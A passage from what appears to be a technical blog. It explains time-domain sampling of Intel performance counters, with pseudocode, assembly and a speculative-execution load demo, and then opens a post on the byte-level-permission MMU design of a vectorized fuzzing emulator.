<p>This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time <em>and</em> the event we’re interested in at the same time. Doing this isn’t too difficult either, we can simply pre-program the performance counter value <code class="language-plaintext highlighter-rouge">IA32_PMCx</code> to <code class="language-plaintext highlighter-rouge">N</code> away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory if we program PMC0 to count number of cycles, set the counter to <code class="language-plaintext highlighter-rouge">2^48 - N</code> where <code class="language-plaintext highlighter-rouge">N</code> is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters after <code class="language-plaintext highlighter-rouge">N</code> cycles.</p>
<p>If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting <code class="language-plaintext highlighter-rouge">N</code> to sample the code at a different cycle count.</p>
<p>This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.</p>
<p>So… lets try it!</p>
<h1 id="the-implementation">The Implementation</h1>
<p>A simple pseudo-code implementation of this sampling method looks as such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Number of times we want to sample each data point. This allows us to look</span>
<span class="c">/// for the minimum, maximum, and average values. This also gives us a way to</span>
<span class="c">/// verify that the environment we're in is deterministic and the results are</span>
<span class="c">/// sane. If minimum == maximum over many samples, it's safe to say we have a</span>
<span class="c">/// very clear picture of what is happening.</span>
<span class="k">const</span> <span class="n">NUM_SAMPLES</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">1000</span><span class="p">;</span>
<span class="c">/// Maximum number of cycles to sample on the x-axis. This limits the sampling</span>
<span class="c">/// space.</span>
<span class="k">const</span> <span class="n">MAX_CYCLES</span><span class="p">:</span> <span class="nb">u64</span> <span class="o">=</span> <span class="mi">1000</span><span class="p">;</span>
<span class="c">// Program the APIC to map the performance counter overflow interrupts to a</span>
<span class="c">// stub assembly routine which simply `iret`s out</span>
<span class="nf">configure_pmc_interrupts_in_apic</span><span class="p">();</span>
<span class="c">// Configure performance counters to freeze on interrupts</span>
<span class="nf">perf_freeze_on_overflow</span><span class="p">();</span>
<span class="c">// Iterate through each performance counter we want to gather data on</span>
<span class="k">for</span> <span class="n">perf_counter</span> <span class="n">in</span> <span class="n">performance_counters_of_interest</span> <span class="p">{</span>
<span class="c">// Disable and reset all performance counters individually</span>
<span class="c">// Clearing their counts to 0, and clearing their event select MSRs to 0</span>
<span class="nf">disable_all_perf_counters</span><span class="p">();</span>
<span class="c">// Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL</span>
<span class="c">// to 0</span>
<span class="nf">disable_perf_globally</span><span class="p">();</span>
<span class="c">// Enable a performance counter (lets say PMC0) to track the `perf_counter`</span>
<span class="c">// we're interested in. Note that this doesn't start the counter yet, as we</span>
<span class="c">// still have the counters globally disabled.</span>
<span class="nf">enable_perf_counter</span><span class="p">(</span><span class="n">perf_counter</span><span class="p">);</span>
<span class="c">// Go through each number of samples we want to collect for this performance</span>
<span class="c">// counter... for each cycle offset.</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">NUM_SAMPLES</span> <span class="p">{</span>
<span class="c">// Go through each cycle we want to observe</span>
<span class="k">for</span> <span class="n">cycle_offset</span> <span class="n">in</span> <span class="mi">1</span><span class="o">..=</span><span class="n">MAX_CYCLES</span> <span class="p">{</span>
<span class="c">// Clear out the performance counter values: IA32_PMCx fields</span>
<span class="nf">clear_perf_counters</span><span class="p">();</span>
<span class="c">// Program fixed counter #1 (un-halted cycle counter) to trigger</span>
<span class="c">// an interrupt on overflow. This will cause an interrupt, which</span>
<span class="c">// will then cause a freeze of all PMCs.</span>
<span class="nf">program_fixed1_interrupt_on_overflow</span><span class="p">();</span>
<span class="c">// Program the fixed counter #1 (un-halted cycle counter) to</span>
<span class="c">// `cycles` prior to overflowing</span>
<span class="nf">set_fixed1_value</span><span class="p">((</span><span class="mi">1</span> <span class="o"><<</span> <span class="mi">48</span><span class="p">)</span> <span class="o">-</span> <span class="n">cycle_offset</span><span class="p">);</span>
<span class="c">// Do some pre-test environment setup. This is important to make</span>
<span class="c">// sure we can sample the code under test multiple times and get</span>
<span class="c">// the same result. Here is where you'd be flushing cache lines,</span>
<span class="c">// maybe doing a `wbinvd`, etc.</span>
<span class="nf">set_up_environment</span><span class="p">();</span>
<span class="c">// Enable both the fixed #1 cycle counter and the PMC0 performance</span>
<span class="c">// counter (tracking the stat we're interested in) at the same time,</span>
<span class="c">// by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't</span>
<span class="c">// have to worry about re-ordering across this boundary.</span>
<span class="nf">enable_perf_globally</span><span class="p">();</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
asm
under
test
here
"#</span> <span class="p">::::</span> <span class="s">"volatile"</span><span class="p">);</span>
<span class="c">// Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters</span>
<span class="nf">disable_perf_globally</span><span class="p">();</span>
<span class="c">// If fixed PMC #1 has not overflowed, then we didn't capture</span>
<span class="c">// relevant data. This only can happen if we tried to sample a</span>
<span class="c">// cycle which happens after the assembly under test executed.</span>
<span class="k">if</span> <span class="nf">fixed1_pmc_overflowed</span><span class="p">()</span> <span class="o">==</span> <span class="k">false</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// At this point we can do whatever we want as the performance</span>
<span class="c">// counters have been turned off by the interrupt and we should have</span>
<span class="c">// relevant data in both :)</span>
<span class="c">// Get the count from fixed #1 PMC. It's important that we grab this</span>
<span class="c">// as interrupts are not deterministic, and thus it's possible we</span>
<span class="c">// "overshoot" the target</span>
<span class="k">let</span> <span class="n">fixed1_count</span> <span class="o">=</span> <span class="nf">read_fixed1_counter</span><span class="p">();</span>
<span class="c">// Add the distance-from-overflow we initially programmed into the</span>
<span class="c">// fixed #1 counter, with the current value of the fixed #1 counter</span>
<span class="c">// to get the total number of cycles which have elapsed during</span>
<span class="c">// our example.</span>
<span class="k">let</span> <span class="n">total_cycles</span> <span class="o">=</span> <span class="n">cycle_offset</span> <span class="o">+</span> <span class="n">fixed1_count</span><span class="p">;</span>
<span class="c">// Read the actual count from the performance counter we were using.</span>
<span class="c">// In this case we were using PMC #0 to track our event of interest.</span>
<span class="k">let</span> <span class="n">value</span> <span class="o">=</span> <span class="nf">read_pmc0</span><span class="p">();</span>
<span class="c">// Somehow log that performance counter `perf_counter` had a value</span>
<span class="c">// `value` `total_cycles` into execution</span>
<span class="nf">log_result</span><span class="p">(</span><span class="n">perf_counter</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">total_cycles</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="simple-results">Simple results</h4>
<p>So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
</code></pre></div></div>
<p><img src="/assets/simplesample.svg" alt="Simple Sample" /></p>
<p>So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).</p>
<p>So does this look right? Hmmm…. we ran 4 instructions, why did we see 8 retire?</p>
<p>Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; Right before test, we end up enabling all performance counters at once by</span>
<span class="c1">; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4</span>
<span class="c1">; programmable counters at the same time as enabling fixed PMC #1 (cycle count)</span>
<span class="err">00000000</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span> <span class="c1">; IA32_PERF_GLOBAL_CTRL</span>
<span class="err">00000005</span> <span class="nf">B80F000000</span> <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0xf</span>
<span class="err">0000000</span><span class="nf">A</span> <span class="nv">BA02000000</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
<span class="err">0000000</span><span class="nf">F</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
<span class="c1">; Here's our code under test :D</span>
<span class="err">00000011</span> <span class="err">4883</span><span class="nf">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000015</span> <span class="err">4883</span><span class="nf">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000019</span> <span class="err">4883</span><span class="nf">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">0000001</span><span class="nf">D</span> <span class="mi">4883</span><span class="nv">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="c1">; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0</span>
<span class="err">00000021</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000026</span> <span class="err">31</span><span class="nf">C0</span> <span class="nv">xor</span> <span class="nb">eax</span><span class="p">,</span><span class="nb">eax</span>
<span class="err">00000028</span> <span class="err">31</span><span class="nf">D2</span> <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000002</span><span class="nf">A</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
</code></pre></div></div>
<p>So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the <code class="language-plaintext highlighter-rouge">wrmsr</code> we used to enable the counters. This makes sense, at some point prior to retirement of the <code class="language-plaintext highlighter-rouge">wrmsr</code> instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!</p>
<p>Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our <code class="language-plaintext highlighter-rouge">add</code> and <code class="language-plaintext highlighter-rouge">sub</code> mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.</p>
<p>These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 <code class="language-plaintext highlighter-rouge">mov</code>, and 2 <code class="language-plaintext highlighter-rouge">xor</code> instructions which retire prior to the <code class="language-plaintext highlighter-rouge">wrmsr</code> which disables the counters. It makes sense that we never see the final <code class="language-plaintext highlighter-rouge">wrmsr</code> retire as the counters will be turned off in the CPU prior to the <code class="language-plaintext highlighter-rouge">wrmsr</code> instruction retiring!</p>
<p>Wala! It all makes sense. We now have a great view into what the CPU did in terms of retirement for this code in question. Everything we saw lined up with what actually executed, always good to see.</p>
<h4 id="a-bit-more-advanced-result">A bit more advanced result</h4>
<p>Lets add a few more performance counters to track. In this case lets track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during test.</p>
<p>Code to test (just a few writes to the stack):</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; Right before test, we end up enabling all performance counters at once by</span>
<span class="c1">; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4</span>
<span class="c1">; programmable counters at the same time as enabling fixed PMC #1 (cycle count)</span>
<span class="err">00000000</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000005</span> <span class="nf">B80F000000</span> <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0xf</span>
<span class="err">0000000</span><span class="nf">A</span> <span class="nv">BA02000000</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
<span class="err">0000000</span><span class="nf">F</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
<span class="err">00000011</span> <span class="err">4883</span><span class="nf">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000015</span> <span class="err">48</span><span class="nf">C7042400000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">0000001</span><span class="nf">D</span> <span class="mi">4883</span><span class="nv">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000021</span> <span class="err">4883</span><span class="nf">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000025</span> <span class="err">48</span><span class="nf">C7042400000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">0000002</span><span class="nf">D</span> <span class="mi">4883</span><span class="nv">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="c1">; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0</span>
<span class="err">00000031</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000036</span> <span class="err">31</span><span class="nf">C0</span> <span class="nv">xor</span> <span class="nb">eax</span><span class="p">,</span><span class="nb">eax</span>
<span class="err">00000038</span> <span class="err">31</span><span class="nf">D2</span> <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000003</span><span class="nf">A</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
</code></pre></div></div>
<p><img src="/assets/storesample.svg" alt="Store Sample" /></p>
<p>This one is fun. We simply make room on the stack (<code class="language-plaintext highlighter-rouge">sub rsp</code>), write a 0 to the stack (<code class="language-plaintext highlighter-rouge">mov [rsp]</code>), and then restore the stack (<code class="language-plaintext highlighter-rouge">add rsp</code>), and then do it all again one more time.</p>
<p>Here we added another plot to the graph, <code class="language-plaintext highlighter-rouge">Port 4</code>, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first <code class="language-plaintext highlighter-rouge">wrmsr</code> enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.</p>
<p>This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!</p>
<h4 id="how-deep-can-we-go">How deep can we go?</h4>
<p>Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.</p>
<p><img src="/assets/busysample.svg" alt="Busy Sample" /></p>
<p>In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!</p>
<h4 id="noise">Noise…</h4>
<p>In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; Right before test, we end up enabling all performance counters at once by</span>
<span class="c1">; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4</span>
<span class="c1">; programmable counters at the same time as enabling fixed PMC #1 (cycle count)</span>
<span class="err">00000000</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000005</span> <span class="nf">B80F000000</span> <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0xf</span>
<span class="err">0000000</span><span class="nf">A</span> <span class="nv">BA02000000</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
<span class="err">0000000</span><span class="nf">F</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
<span class="err">00000011</span> <span class="err">48</span><span class="nf">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="err">0000001</span><span class="nf">D</span> <span class="mi">48</span><span class="nv">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="err">00000029</span> <span class="err">48</span><span class="nf">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="err">00000035</span> <span class="err">48</span><span class="nf">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="c1">; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0</span>
<span class="err">00000041</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000046</span> <span class="err">31</span><span class="nf">C0</span> <span class="nv">xor</span> <span class="nb">eax</span><span class="p">,</span><span class="nb">eax</span>
<span class="err">00000048</span> <span class="err">31</span><span class="nf">D2</span> <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000004</span><span class="nf">A</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
</code></pre></div></div>
<p>Here we’re just going to write to <code class="language-plaintext highlighter-rouge">NULL</code> 4 times. This might sound bad, but in this example I mapped <code class="language-plaintext highlighter-rouge">NULL</code> in as normal write-back memory. Nothing crazy, just treat it as a valid address.</p>
<p>But here are the results:</p>
<p><img src="/assets/noisesample.svg" alt="Noise Sample" /></p>
<p>Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.</p>
<p>These results can get a bit more complex to interpret, but it’s still relevant data nevertheless. Changing the code under test, cleaning up to the environment to be more determinsitic, etc, can often improve the quality and visibility of the data.</p>
<h4 id="does-it-work-with-speculation">Does it work with speculation?</h4>
<p>Damn right it does! That was the whole point!</p>
<p>Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="err">//</span> <span class="nf">Start</span> <span class="nv">a</span> <span class="nv">TSX</span> <span class="nv">section</span><span class="p">,</span> <span class="nv">think</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">as</span> <span class="nv">a</span> <span class="s">`try {`</span> <span class="nb">bl</span><span class="nv">ock</span>
<span class="nf">xbegin</span> <span class="mi">2</span><span class="nv">f</span>
<span class="err">//</span> <span class="nf">Read</span> <span class="nv">from</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="nv">causing</span> <span class="nv">a</span> <span class="nv">fault</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="err">//</span> <span class="nf">Here</span><span class="err">'</span><span class="nv">s</span> <span class="nv">some</span> <span class="nv">loads</span> <span class="nv">shadowing</span> <span class="nv">the</span> <span class="nv">faulting</span> <span class="nv">load.</span> <span class="nv">These</span>
<span class="err">//</span> <span class="nf">should</span> <span class="nv">never</span> <span class="nv">occur</span><span class="p">,</span> <span class="nv">as</span> <span class="nv">the</span> <span class="nv">instruction</span> <span class="nv">above</span> <span class="nv">causes</span>
<span class="err">//</span> <span class="nf">an</span> <span class="nv">exeception</span> <span class="nv">and</span> <span class="nv">thus</span> <span class="nv">execution</span> <span class="nv">should</span> <span class="s">"jump"</span> <span class="nv">to</span> <span class="nv">the</span> <span class="nv">label</span> <span class="s">`2:`</span>
<span class="nf">.rept</span> <span class="mi">32</span>
<span class="err">//</span> <span class="nf">Repeated</span> <span class="nv">load</span> <span class="mi">32</span> <span class="nv">times</span>
<span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="nf">.endr</span>
<span class="err">//</span> <span class="nf">End</span> <span class="nv">the</span> <span class="nv">TSX</span> <span class="nv">section</span><span class="p">,</span> <span class="nv">think</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">as</span> <span class="nv">a</span> <span class="s">`}`</span> <span class="nb">cl</span><span class="nv">osing</span> <span class="nv">the</span>
<span class="err">//</span> <span class="err">`</span><span class="nf">try</span><span class="err">`</span> <span class="nb">bl</span><span class="nv">ock</span>
<span class="nf">xend</span>
<span class="err">2:</span>
<span class="err">//</span> <span class="nf">Here</span> <span class="nv">is</span> <span class="nv">where</span> <span class="nv">execution</span> <span class="nv">goes</span> <span class="nv">if</span> <span class="nv">the</span> <span class="nv">TSX</span> <span class="nv">section</span> <span class="nv">had</span>
<span class="err">//</span> <span class="nf">an</span> <span class="nv">exception</span><span class="p">,</span> <span class="nv">and</span> <span class="nv">thus</span> <span class="nv">where</span> <span class="nv">execution</span> <span class="nv">will</span> <span class="nv">flow</span>
</code></pre></div></div>
<p><img src="/assets/speculationsample.svg" alt="Speculation Sample" /></p>
<p>Both ports 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see <em>many</em> different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!</p>
<h4 id="more-data">More data?</h4>
<p>I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!</p>
<hr />
<h1 id="conclusion-1">Conclusion</h1>
<p>This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!</p>
<p>This tool is incredibly useful for validating hypothesises about behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!</p>
<hr />
<h1 id="source">Source?</h1>
<p>Update: 8/19/2019</p>
<p>This kernel has too many sensitive features that I do not want to make public at this time…</p>
<p>However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel <a href="https://github.com/gamozolabs/orange_slice">Orange Slice</a>!</p>
<hr />TwitterVectorized Emulation: MMU Design2018-11-19T19:10:50+00:002018-11-19T19:10:50+00:00https://gamozolabs.github.io/fuzzing/2018/11/19/vectorized_emulation_mmu<p><img src="/assets/softserve.png" alt="Softserve" /></p>
<p><em>New vectorized emulator codenamed softserve</em></p>
<h1 id="tweeter">Tweeter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up.</p>
<h1 id="check-out-the-intro">Check out the intro</h1>
<p>This is the continuation of a multipart series. See the introduction post <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">here</a></p>
<p>This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!</p>
<p>Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!</p>
<h1 id="the-code">The code</h1>
<p>This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found <a href="https://github.com/gamozolabs/vectorized_mmu">here</a>. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.</p>
<p>By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.</p>
<p>It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the <em>correct</em> operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.</p>
<h1 id="intro">Intro</h1>
<p>Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further the MMU design used here also is designed to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has it’s own permission bits. Since vectorized emulation is meant for fuzzing it’s also important that the memory state can quickly be restored to the original state quickly so a new fuzz iteration can be started.</p>
<p>During this blog we introduce a few big concepts:</p>
<ul>
<li>Differential restores</li>
<li>Byte-level permissions</li>
<li>Read-after-write memory (uninitialized memory tracking)</li>
<li>Gage fuzzing</li>
<li>Aliased/CoW memory</li>
<li>Deduplicated memory</li>
<li>Technical details about the IL relevant to the MMU</li>
<li>Painful details about everything</li>
</ul>
<p>Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges <code class="language-plaintext highlighter-rouge">0xffff...</code> and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, where things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.</p>
<h1 id="the-problem">The problem</h1>
<p>Before we get into describing the solution, let’s address what the problem is in the first place!</p>
<p>When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access it’s own memory, and it isn’t overwriting the emulator’s memory itself. To do this there are multiple traditional solutions:</p>
<ul>
<li>Restrict the address space of the guest such that it can fit entirely in the emulator’s address space</li>
<li>Use a data structure to emulate a sparse guest’s memory space</li>
<li>Create a new process/VM with only the guest’s memory mapped in</li>
</ul>
<p>The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via <code class="language-plaintext highlighter-rouge">mmap</code> or <code class="language-plaintext highlighter-rouge">VirtualProtect</code>. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space <code class="language-plaintext highlighter-rouge">0xffff...</code> and beyond. This memory is typically reserved for the kernel. This is the model used by things like <code class="language-plaintext highlighter-rouge">qemu-user</code> as it is super fast and works great for well-behaving userland applications. By setting the <code class="language-plaintext highlighter-rouge">QEMU_GUEST_BASE</code> environment variable you can change this base and set the size with <code class="language-plaintext highlighter-rouge">QEMU_RESERVED_VA</code>.</p>
<p>The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.</p>
<p>The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This will make the emulator tied to an architecture, might require a driver, and like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section</p>
<hr />
<h1 id="history">History</h1>
<p><em>Feel free to skip this section if you don’t care about context</em></p>
<p>To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. <em>Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.</em></p>
<h4 id="first-generation">First generation</h4>
